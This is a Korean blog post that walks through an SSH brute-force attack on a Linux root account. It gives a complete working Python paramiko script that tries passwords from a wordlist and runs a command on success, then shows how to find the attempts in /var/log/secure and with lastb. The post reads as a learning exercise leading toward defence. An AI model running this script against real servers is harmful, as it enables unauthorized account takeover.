[Linux] SSH Brute Force 공격 파이썬 구현 및 확인 CentOS7

Brute Force Attack

시스템을 해킹하기 위해서는 사용하는 여러가지 방법 중 시스템의 계정 비밀번호를 무작위 공격으로 알아내는 것을 Brute Attack 이라고 표현한다.

파이썬으로 리눅스 root 계정 비밀번호를 알아내기 위한 SSH Brute Force Attack을 구현해보고 흔적을 확인해보자.

 

Python 코드

import paramiko

server = input("Server IP: ")
user = input("User: ")
cli = paramiko.SSHClient()
cli.set_missing_host_key_policy(paramiko.AutoAddPolicy)

def bruteCracking(server, user, pwd, code = 0):
    try:
        cli.connect(server, port='22', username=user, password = pwd)
        print('login successed')
        stdin, stdout, stderr = cli.exec_command("ls -al")
        print(''.join(stdout.readlines()))
    except paramiko.AuthenticationException:
        code = 1
    cli.close()
    return code    


with open("passwords.txt", "r") as passwords:
    count = 0
    for password in passwords:
        pwd = password.strip()
        count += 1
        print("Trying: "+ str(count) +" Time For => " + pwd)
        attack = bruteCracking(server, user, pwd)
        if attack == 1:
            print("login failed.. next attack")
        else:
            break
            
    print("Some Error Occurred Please Check Your Internet Connection !!")

아직 코딩은 익숙하지 않아 뚝딱뚝딱 만들어 보았다. 

SSH를 통한 원격 로그인 시도는 /var/log/secure 파일에 기록이 된다. 따라서 Brute Attack 공격을 확인하기 위해서는 해당 파일을 열어볼 필요가 있다.

 

var/log/secure 파일

해당 로그에는 공격자 IP까지 찍히는데 보통 해커들은 IP까지 난수로 생성하여 공격을 할 것이다.

 

lastb

로그인 실패 내역은 /var/log/btmp 에 저장이 되며 이를 확인하기 위해 명령어 lastb를 사용한다.

이를 통해 접속 계정, 터미널, 접속 IP , 일자를 알 수 있다.

 

또는 아래와 같이 명령어를 입력하여 공격자가 몇시에 어떤 계정과 IP에서 접속을 시도하여 로그인을 성공하였는지 알수 있다. 만약 출력되지 않았다면 공격을 하였지만 계정의 비밀번호는 찾지 못한 것이다.

cat /var/log/secure | grep Accepted | awk '{print $1"\t"$2"\t"$3"\t" $9"\t"$11"\t"$14}'

이러한 무작위 공격인 시스템에 부하를 많이 가져올 수 있기 때문에 시스템이 느려질 수가 있다.

다음에는 Brute Force Attack을 방어할 수 있는 방법에 대해 알아보도록 하겠다.